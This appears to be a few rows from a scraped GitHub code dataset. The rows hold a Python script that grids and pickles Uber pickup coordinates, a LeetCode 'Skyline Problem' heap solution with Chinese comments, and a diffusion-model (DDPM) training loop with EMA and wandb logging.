[25, 50, 75]
double([3, 6, 9])
[15, 30, 45]
| CompThinking19/exploratory-programming-1-tdg52 | Exploratory1.py | Exploratory1.py | py | 297 | python | en | code | 0 | github-code | 90 |
29855976115 | import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib import colors
from pyproj import Proj,transform
from collections import Counter
import pickle
def longLatToXY(long, lat):
"""
converts epsg:4326 long lat (degrees) coordiantes to epsg:3857 xy coordiantes
:param long: longtitude
:param lat: latitude
:return: xy tuple
"""
sourceProj = Proj(init='epsg:4326')
targetProj = Proj(init='epsg:3857')
return transform(sourceProj, targetProj, long, lat)
def XyToLongLat(x, y):
"""
converts epsg:3856 xy coordinates to epsg:4326 long lat coordiantes (degrees)
:param x: x coordinate
:param y: y coordiante
:return: long lat tuple
"""
sourceProj = Proj(init='epsg:3857')
targetProj = Proj(init='epsg:4326')
return transform(sourceProj, targetProj, x, y)
def main():
# set path to dataset (csv)
dataPath = '/Users/chanaross/Documents/Thesis/UberData/allData.csv'
xGridResolution = 500 # grid rectangle width
yGridResolution = 500 # grid rectangle height
# read data to dataframe
df = pd.read_csv(dataPath)
# date manipulation
df['TimeStamp'] = pd.DatetimeIndex(df['Date/Time'])
df['weekday'] = df['TimeStamp'].dt.weekday
df['weeknum'] = df['TimeStamp'].dt.week
df['month'] = df['TimeStamp'].dt.month
df['hour'] = df['TimeStamp'].dt.hour
df['minute'] = df['TimeStamp'].dt.minute
# remove string datetime, keep stamp
df = df.drop('Date/Time', axis=1)
# add repetitive weekly time id
df['weekPeriod'] = df['weekday']*(24*4) + df['hour']*4 + np.floor_divide(df['minute'], 15).astype(np.int64)
df['dayQuad'] = np.floor_divide(df['hour'], 4).astype(np.int64)
# coordinate transformation and grid creation
# transform picture to be straight with lat , lon (transformation angle is 36.1)
df['Fixed_Lon'] = df['Lon'] * np.cos(36.1 * np.pi / 180) - df['Lat'] * np.sin(36.1 * np.pi / 180)
df['Fixed_Lat'] = df['Lat'] * np.cos(36.1 * np.pi / 180) + df['Lon'] * np.sin(36.1 * np.pi / 180)
df['original_Lon'] = df['Lon']
df['original_Lat'] = df['Lat']
df['Lon'] = df['Fixed_Lon']
df['Lat'] = df['Fixed_Lat']
# create list of tuples of long lat coordiantes
longLatTupleList = zip(df['Lon'].tolist(), df['Lat'].tolist())
# create list of tuples of x,y coordiantes
xyTupleList = [longLatToXY(*t) for t in longLatTupleList]
# add to df
xCoordinates = [c[0] for c in xyTupleList]
yCoordinates = [c[1] for c in xyTupleList]
df['x'] = xCoordinates
df['y'] = yCoordinates
# create grid
xMinCoord = np.min(df['x'])
yMinCoord = np.min(df['y'])
# calculate distance from grid edges
df['x_grid_dist'] = df['x']-xMinCoord
df['y_grid_dist'] = df['y']-yMinCoord
# add grid indices to dataframe
df['grid_x'] = np.floor_divide(df['x_grid_dist'], xGridResolution).astype(np.int64)
df['grid_y'] = np.floor_divide(df['y_grid_dist'], yGridResolution).astype(np.int64)
# add single index grid id
maxXgrid = np.max(df['grid_x'])
df['grid_id'] = df['grid_x'] + df['grid_y']*maxXgrid
# pickle data
df.to_pickle(dataPath.replace('.csv', 'LatLonCorrected_Gridpickle500.p'))
with open (dataPath.replace('.csv', 'LatLonCorrected__Gridpickle500.p'), 'wb') as op:
pickle.dump(df,op)
df.to_csv(dataPath.replace('.csv', 'LatLonCorrected_GridXY500.csv'))
return
if __name__=='__main__':
main()
print('Done.') | ChanaRoss/Thesis | UberData/preproc.py | preproc.py | py | 3,501 | python | en | code | 0 | github-code | 90 |
4958288371 | '''
218. The Skyline Problem
Hard
A city's skyline is the outer contour of the silhouette formed by all the buildings in that city when viewed from a distance. Now suppose you are given the locations and height of all the buildings as shown on a cityscape photo (Figure A), write a program to output the skyline formed by these buildings collectively (Figure B).
Buildings Skyline Contour
The geometric information of each building is represented by a triplet of integers [Li, Ri, Hi], where Li and Ri are the x coordinates of the left and right edge of the ith building, respectively, and Hi is its height. It is guaranteed that 0 ≤ Li, Ri ≤ INT_MAX, 0 < Hi ≤ INT_MAX, and Ri - Li > 0. You may assume all buildings are perfect rectangles grounded on an absolutely flat surface at height 0.
For instance, the dimensions of all buildings in Figure A are recorded as: [ [2 9 10], [3 7 15], [5 12 12], [15 20 10], [19 24 8] ] .
The output is a list of "key points" (red dots in Figure B) in the format of [ [x1,y1], [x2, y2], [x3, y3], ... ] that uniquely defines a skyline. A key point is the left endpoint of a horizontal line segment. Note that the last key point, where the rightmost building ends, is merely used to mark the termination of the skyline, and always has zero height. Also, the ground in between any two adjacent buildings should be considered part of the skyline contour.
For instance, the skyline in Figure B should be represented as:[ [2 10], [3 15], [7 12], [12 0], [15 10], [20 8], [24, 0] ].
Notes:
The number of buildings in any input list is guaranteed to be in the range [0, 10000].
The input list is already sorted in ascending order by the left x position Li.
The output list must be sorted by the x position.
There must be no consecutive horizontal lines of equal height in the output skyline. For instance, [...[2 3], [4 5], [7 5], [11 5], [12 7]...] is not acceptable; the three lines of height 5 should be merged into one in the final output as such: [...[2 3], [4 5], [12 7], ...]
'''
from __future__ import annotations
import heapq
class Solution:
def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:
#这里的sort很关键,(在同一位置多个高度)让高点位的左侧线先处理,(如果在同一点左侧线右侧线都有)让右侧线后处理
# [x, -h, y, True] 和 [y, h, y, False]
bpq=sorted([[x, -h, y, True] for x, y, h in buildings] + [[y, h, y, False] for x, y, h in buildings])
height=[[0, -1]] #存的都是negtive height, 为了从大到小的priority
result=[[-1, 0]]
for x, negh, y, left in bpq:
if left:
#negh这里是negtive值,
#由于有以上sort的处理,同点多高度情况,高点位先处理,所以会覆盖之后的同点低位
heapq.heappush(height, [negh, y])
else:
#negh这里是事实上是positive值
if y == height[0][1] and negh == -height[0][0]:
#由于有以上sort的处理,同点有左右线时,左线已被压上queue,所以高度相同不会重复,eg. 不会出现[2,9],[5,9]
while 0 <= height[0][1] <= y:
heapq.heappop(height)
#由于有以上sort的处理,同点多高度 和 不同点同高度,处理都被简化
if result[-1][1] != -height[0][0]:
result += [[x, -height[0][0]]]
return result[1:]
s=Solution()
r=s.getSkyline([[0,2,3],[2,5,3]])
print(r) | boxu0001/practice | py3/S218_skyline.py | S218_skyline.py | py | 3,594 | python | en | code | 0 | github-code | 90 |
25926779350 | import tqdm
import copy
import torch
from utils.configs import config_parser
from utils.common import create_usage
from utils.ddpm import batch_diffusion, batch_inverse
from utils.wandb_helper import LOG
from utils.ema import EMA
from dataset.data import POKEMON_DATASET
if __name__ == "__main__":
# NOTE Step: Preparation
# * train configures
hparams = config_parser()
# * train dataset and dataloader
dataset = POKEMON_DATASET(hparams)
dataloader = dataset.set_loader(bs=hparams.batch_size, is_shuffle=True)
hparams.max_step = hparams.max_epoch * len(dataloader)
# * ddpm model, ddpm noise, optim, optim_sched, loss_func
ddpm_model, ddpm_noise_sched, ddpm_optim, ddpm_optim_sched, ddpm_loss_func = create_usage(hparams)
# * ema for better performance
ema = EMA(hparams.ema_beta)
ema_model = copy.deepcopy(ddpm_model).eval().requires_grad_(False)
logger = LOG()
logger.log_in(configs=hparams, name=hparams.exp_name, project="DDPM")
logger.log_metric_init()
# NOTE Step: Train
# * training loop
cur_iter = 0
pbar_epoch = tqdm.tqdm(range(hparams.max_epoch), desc="train ddpm", leave=True)
for cur_ep in pbar_epoch:
pbar_iter = tqdm.tqdm(dataloader, desc=f"train epoch {cur_ep}", leave=False)
loss_ep = 0
for batch_data in pbar_iter:
batch_data = batch_data.to(hparams.device)
batch_noise, batch_out_sample = batch_diffusion(hparams, batch_data, ddpm_noise_sched, ddpm_model)
loss = ddpm_loss_func(batch_noise, batch_out_sample)
loss.backward()
torch.nn.utils.clip_grad_norm_(ddpm_model.parameters(), 1.0)
ddpm_optim.step()
ddpm_optim_sched.step()
ddpm_optim.zero_grad()
ema.step_ema(ema_model, ddpm_model)
loss_iter = loss.item()
loss_ep += loss_iter
pbar_iter.set_postfix_str(f"[TRAIN] Iter: {cur_iter} Loss: {loss_iter:.3f}", refresh=True)
pbar_epoch.set_postfix_str(f"[TRAIN] EP: {cur_ep} Loss: {loss_ep:.3f}", refresh=True)
logger.log_value(tag="train", name="ep_loss", value=loss_ep, step=cur_ep)
# * test loop
if (cur_ep+1)%hparams.eval_epoch == 0:
images_pred = batch_inverse(hparams, ddpm_noise_sched, ddpm_model)
images_pred = images_pred.cpu().detach().clone().permute([0,2,3,1]).numpy()
logger.log_images(tag="test", name="ddpm_generation", values=images_pred, step=cur_ep, n_col=5)
logger.log_out() | jameskuma/Simple_Diffusion | run.py | run.py | py | 2,544 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.